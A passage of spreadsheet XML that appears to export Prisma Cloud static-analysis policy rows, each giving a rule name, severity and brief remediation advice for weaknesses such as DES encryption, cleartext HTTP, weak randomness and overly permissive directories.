        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC348" t="inlineStr">
        <is>
          <t>CKV3_SAST_13</t>
        </is>
      </c>
      <c r="AD348" t="b">
        <v>1</v>
      </c>
      <c r="AE348" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF348" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>6c474a7d-7953-47fe-992f-2273bfbec5e8</t>
        </is>
      </c>
      <c r="AI348" t="inlineStr"/>
      <c r="AJ348" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK348" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" t="inlineStr"/>
      <c r="B349" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C349" s="2" t="inlineStr"/>
      <c r="D349" t="inlineStr"/>
      <c r="E349" t="inlineStr"/>
      <c r="F349" t="inlineStr"/>
      <c r="G349" t="b">
        <v>1</v>
      </c>
      <c r="H3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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J349" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K349" t="inlineStr">
        <is>
          <t>Unsecure cookie handling in response</t>
        </is>
      </c>
      <c r="L349" t="inlineStr"/>
      <c r="M349" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N349" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O349" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P349" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q349" t="inlineStr"/>
      <c r="R349" t="inlineStr"/>
      <c r="S349" t="inlineStr"/>
      <c r="T349" t="b">
        <v>0</v>
      </c>
      <c r="U349" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V349" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W349" t="inlineStr">
        <is>
          <t>The information stored in a custom cookie should not be sensitive or related to the session. In most cases, sensitive data should only be stored in session and referenced by the user's session cookie.</t>
        </is>
      </c>
      <c r="X349" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-142</t>
        </is>
      </c>
      <c r="Y349" t="inlineStr"/>
      <c r="Z349" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA349" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB349" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC349" t="inlineStr">
        <is>
          <t>CKV3_SAST_142</t>
        </is>
      </c>
      <c r="AD349" t="b">
        <v>1</v>
      </c>
      <c r="AE349" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF349" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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9" t="inlineStr">
        <is>
          <t>b1b7b5b2-d4ea-4370-88f1-8a8b5de74b5b</t>
        </is>
      </c>
      <c r="AI349" t="inlineStr"/>
      <c r="AJ349" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK349" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" t="inlineStr"/>
      <c r="B350" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C350" s="2" t="inlineStr"/>
      <c r="D350" t="inlineStr"/>
      <c r="E350" t="inlineStr"/>
      <c r="F350" t="inlineStr"/>
      <c r="G350" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J350" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K350" t="inlineStr">
        <is>
          <t>Usage of weak DES encryption algorithms</t>
        </is>
      </c>
      <c r="L350" t="inlineStr"/>
      <c r="M350" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N350" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O350" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P350" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q350" t="inlineStr"/>
      <c r="R350" t="inlineStr"/>
      <c r="S350" t="inlineStr"/>
      <c r="T350" t="b">
        <v>0</v>
      </c>
      <c r="U350" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V350" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W350" t="inlineStr">
        <is>
          <t>This policy identifies the use of the DES and Triple DES encryption algorithms from the crypto/des package in Go applications. These algorithms are considered weak and insecure due to their small key sizes. It is recommended to use stronger, modern algorithms like AES from the crypto/aes package instead.</t>
        </is>
      </c>
      <c r="X350" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-239</t>
        </is>
      </c>
      <c r="Y350" t="inlineStr"/>
      <c r="Z350" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA350" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB350" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC350" t="inlineStr">
        <is>
          <t>CKV3_SAST_239</t>
        </is>
      </c>
      <c r="AD350" t="b">
        <v>1</v>
      </c>
      <c r="AE350" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF350" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>e8c0cfd3-dde1-4541-a73d-94e25385a303</t>
        </is>
      </c>
      <c r="AI350" t="inlineStr"/>
      <c r="AJ350" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK350" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" t="inlineStr"/>
      <c r="B351" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C351" s="2" t="inlineStr"/>
      <c r="D351" t="inlineStr"/>
      <c r="E351" t="inlineStr"/>
      <c r="F351" t="inlineStr"/>
      <c r="G351" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J351" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K351" t="inlineStr">
        <is>
          <t>Improper Input Validation</t>
        </is>
      </c>
      <c r="L351" t="inlineStr"/>
      <c r="M351" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N351" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O351" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P351" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q351" t="inlineStr"/>
      <c r="R351" t="inlineStr"/>
      <c r="S351" t="inlineStr"/>
      <c r="T351" t="b">
        <v>0</v>
      </c>
      <c r="U351" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V351" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W351" t="inlineStr">
        <is>
          <t>Without proper access control, executing an LDAP statement that contains a user-controlled value can allow an attacker to abuse poorly configured LDAP context</t>
        </is>
      </c>
      <c r="X351" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/sast-policies/java-policies/sast-policy-188</t>
        </is>
      </c>
      <c r="Y351" t="inlineStr"/>
      <c r="Z351" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA351" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB351" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC351" t="inlineStr">
        <is>
          <t>CKV3_SAST_188</t>
        </is>
      </c>
      <c r="AD351" t="b">
        <v>1</v>
      </c>
      <c r="AE351" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF351" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>169ec063-b738-4963-8e73-6009f4f32be2</t>
        </is>
      </c>
      <c r="AI351" t="inlineStr"/>
      <c r="AJ351" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK351" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" t="inlineStr"/>
      <c r="B352" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C352" s="2" t="inlineStr"/>
      <c r="D352" t="inlineStr"/>
      <c r="E352" t="inlineStr"/>
      <c r="F352" t="inlineStr"/>
      <c r="G352" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J352" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K352" t="inlineStr">
        <is>
          <t>Cleartext HTTP transmission of sensitive information</t>
        </is>
      </c>
      <c r="L352" t="inlineStr"/>
      <c r="M352" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N352" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O352" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P352" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q352" t="inlineStr"/>
      <c r="R352" t="inlineStr"/>
      <c r="S352" t="inlineStr"/>
      <c r="T352" t="b">
        <v>0</v>
      </c>
      <c r="U352" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V352" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W352" t="inlineStr">
        <is>
          <t>Detected usage of Http or unencrypted Socket which can lead to leakage of sensitive data, instead use Https</t>
        </is>
      </c>
      <c r="X352" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-102</t>
        </is>
      </c>
      <c r="Y352" t="inlineStr"/>
      <c r="Z352" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA352" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB352" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC352" t="inlineStr">
        <is>
          <t>CKV3_SAST_102</t>
        </is>
      </c>
      <c r="AD352" t="b">
        <v>1</v>
      </c>
      <c r="AE352" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF352" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>10929a75-fa35-41df-ac43-d9dc47214c8a</t>
        </is>
      </c>
      <c r="AI352" t="inlineStr"/>
      <c r="AJ352" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK352" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" t="inlineStr"/>
      <c r="B353" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C353" s="2" t="inlineStr"/>
      <c r="D353" t="inlineStr"/>
      <c r="E353" t="inlineStr"/>
      <c r="F353" t="inlineStr"/>
      <c r="G353" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J353" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K353" t="inlineStr">
        <is>
          <t>Use of insecure IPMI-related modules</t>
        </is>
      </c>
      <c r="L353" t="inlineStr"/>
      <c r="M353" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N353" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O353" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P353" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q353" t="inlineStr"/>
      <c r="R353" t="inlineStr"/>
      <c r="S353" t="inlineStr"/>
      <c r="T353" t="b">
        <v>0</v>
      </c>
      <c r="U353" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V353" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W353" t="inlineStr">
        <is>
          <t>An IPMI-related module is being imported. IPMI is considered insecure. Use an encrypted protocol.</t>
        </is>
      </c>
      <c r="X353" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-37</t>
        </is>
      </c>
      <c r="Y353" t="inlineStr"/>
      <c r="Z353" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA353" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB353" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC353" t="inlineStr">
        <is>
          <t>CKV3_SAST_37</t>
        </is>
      </c>
      <c r="AD353" t="b">
        <v>1</v>
      </c>
      <c r="AE353" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF353" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>a8e89fab-5872-465c-9d13-292bf910a365</t>
        </is>
      </c>
      <c r="AI353" t="inlineStr"/>
      <c r="AJ353" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK353" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" t="inlineStr"/>
      <c r="B354" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C354" s="2" t="inlineStr"/>
      <c r="D354" t="inlineStr"/>
      <c r="E354" t="inlineStr"/>
      <c r="F354" t="inlineStr"/>
      <c r="G354" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J354" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K354" t="inlineStr">
        <is>
          <t>Insecure communication using postMessage and event listeners</t>
        </is>
      </c>
      <c r="L354" t="inlineStr"/>
      <c r="M354" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N354" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O354" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P354" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q354" t="inlineStr"/>
      <c r="R354" t="inlineStr"/>
      <c r="S354" t="inlineStr"/>
      <c r="T354" t="b">
        <v>0</v>
      </c>
      <c r="U354" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V354" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W354" t="inlineStr">
        <is>
          <t>Ensure to avoid the wildcard origin '*' in postMessage and always check the event origin in addEventListener handlers for message events to prevent data leakage or unauthorized actions.</t>
        </is>
      </c>
      <c r="X354" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-74</t>
        </is>
      </c>
      <c r="Y354" t="inlineStr"/>
      <c r="Z354" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA354" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB354" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC354" t="inlineStr">
        <is>
          <t>CKV3_SAST_74</t>
        </is>
      </c>
      <c r="AD354" t="b">
        <v>1</v>
      </c>
      <c r="AE354" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF354" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>c7c7351c-b611-42d9-962b-ee9156577763</t>
        </is>
      </c>
      <c r="AI354" t="inlineStr"/>
      <c r="AJ354" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK354" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" t="inlineStr"/>
      <c r="B355" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C355" s="2" t="inlineStr"/>
      <c r="D355" t="inlineStr"/>
      <c r="E355" t="inlineStr"/>
      <c r="F355" t="inlineStr"/>
      <c r="G355" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J355" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K355" t="inlineStr">
        <is>
          <t>Incorrect behavior order: validate before canonicalize</t>
        </is>
      </c>
      <c r="L355" t="inlineStr"/>
      <c r="M355" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N355" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O355" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P355" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q355" t="inlineStr"/>
      <c r="R355" t="inlineStr"/>
      <c r="S355" t="inlineStr"/>
      <c r="T355" t="b">
        <v>0</v>
      </c>
      <c r="U355" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V355" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W355" t="inlineStr">
        <is>
          <t>The application was found matching a variable during a regular expression pattern match, and then calling a Unicode normalize function after validation has occurred. This is usually indicative of a poor input validation strategy as an adversary may attempt to exploit the normalization process. To remediate this issue, always perform Unicode normalization before any validation of a string.</t>
        </is>
      </c>
      <c r="X355" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-133</t>
        </is>
      </c>
      <c r="Y355" t="inlineStr"/>
      <c r="Z355" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA355" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB355" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC355" t="inlineStr">
        <is>
          <t>CKV3_SAST_133</t>
        </is>
      </c>
      <c r="AD355" t="b">
        <v>1</v>
      </c>
      <c r="AE355" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF355" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>474c3b30-0dc8-44b5-835f-4de945cf28a9</t>
        </is>
      </c>
      <c r="AI355" t="inlineStr"/>
      <c r="AJ355" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK355" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" t="inlineStr"/>
      <c r="B356" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C356" s="2" t="inlineStr"/>
      <c r="D356" t="inlineStr"/>
      <c r="E356" t="inlineStr"/>
      <c r="F356" t="inlineStr"/>
      <c r="G356" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J356" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K356" t="inlineStr">
        <is>
          <t>Unsecure sending of emails from application</t>
        </is>
      </c>
      <c r="L356" t="inlineStr"/>
      <c r="M356" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N356" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O356" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P356" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q356" t="inlineStr"/>
      <c r="R356" t="inlineStr"/>
      <c r="S356" t="inlineStr"/>
      <c r="T356" t="b">
        <v>0</v>
      </c>
      <c r="U356" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V356" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W356" t="inlineStr">
        <is>
          <t>Sending emails is security-sensitive.</t>
        </is>
      </c>
      <c r="X356" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-63</t>
        </is>
      </c>
      <c r="Y356" t="inlineStr"/>
      <c r="Z356" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA356" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB356" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC356" t="inlineStr">
        <is>
          <t>CKV3_SAST_63</t>
        </is>
      </c>
      <c r="AD356" t="b">
        <v>1</v>
      </c>
      <c r="AE356" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF356" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>4912bed6-e2d5-450a-8e16-b44e327159e0</t>
        </is>
      </c>
      <c r="AI356" t="inlineStr"/>
      <c r="AJ356" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK356" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" t="inlineStr"/>
      <c r="B357" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C357" s="2" t="inlineStr"/>
      <c r="D357" t="inlineStr"/>
      <c r="E357" t="inlineStr"/>
      <c r="F357" t="inlineStr"/>
      <c r="G357" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J357" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K357" t="inlineStr">
        <is>
          <t>Use of insufficiently random values from core library</t>
        </is>
      </c>
      <c r="L357" t="inlineStr"/>
      <c r="M357" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N357" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O357" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P357" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q357" t="inlineStr"/>
      <c r="R357" t="inlineStr"/>
      <c r="S357" t="inlineStr"/>
      <c r="T357" t="b">
        <v>0</v>
      </c>
      <c r="U357" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V357" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W357" t="inlineStr">
        <is>
          <t>Depending on the context, generating weak random numbers may expose cryptographic functions which rely on these numbers, to be exploitable. When generating numbers for sensitive values such as tokens, nonces, and cryptographic keys, it is recommended that the `DRBG` instance of `SecureRandom` be used.</t>
        </is>
      </c>
      <c r="X357" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-155</t>
        </is>
      </c>
      <c r="Y357" t="inlineStr"/>
      <c r="Z357" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA357" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB357" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC357" t="inlineStr">
        <is>
          <t>CKV3_SAST_155</t>
        </is>
      </c>
      <c r="AD357" t="b">
        <v>1</v>
      </c>
      <c r="AE357" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF357" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>198d18f0-c459-4e35-a717-8a86986321a9</t>
        </is>
      </c>
      <c r="AI357" t="inlineStr"/>
      <c r="AJ357" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK357" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" t="inlineStr"/>
      <c r="B358" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C358" s="2" t="inlineStr"/>
      <c r="D358" t="inlineStr"/>
      <c r="E358" t="inlineStr"/>
      <c r="F358" t="inlineStr"/>
      <c r="G358" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J358" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K358" t="inlineStr">
        <is>
          <t>Excessive directory permissions in Go applications</t>
        </is>
      </c>
      <c r="L358" t="inlineStr"/>
      <c r="M358" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N358" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O358" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P358" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q358" t="inlineStr"/>
      <c r="R358" t="inlineStr"/>
      <c r="S358" t="inlineStr"/>
      <c r="T358" t="b">
        <v>0</v>
      </c>
      <c r="U358" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V358" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W358" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications set overly permissive directory permissions using os.Mkdir or os.MkdirAll. Permissions greater than 0750 can expose directories to unauthorized access. It is recommended to use more restrictive permissions, such as 0700 for read/write access by the application user only, or 0750 to allow group users to read the files.</t>
        </is>
      </c>
      <c r="X358" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-249</t>
        </is>
      </c>
      <c r="Y358" t="inlineStr"/>
      <c r="Z358" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA358" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB358" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC358" t="inlineStr">
        <is>
          <t>CKV3_SAST_249</t>
        </is>
      </c>
      <c r="AD358" t="b">
        <v>1</v>
      </c>
      <c r="AE358" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF358" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>2837f139-4f29-4fab-a1e9-4867014f0aac</t>
        </is>
      </c>
      <c r="AI358" t="inlineStr"/>
      <c r="AJ358" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK358" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" t="inlineStr"/>
      <c r="B359" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C359" s="2" t="inlineStr"/>
      <c r="D359" t="inlineStr"/>
      <c r="E359" t="inlineStr"/>
      <c r="F359" t="inlineStr"/>
      <c r="G359" t="b">
        <v>1</v>
      </c>
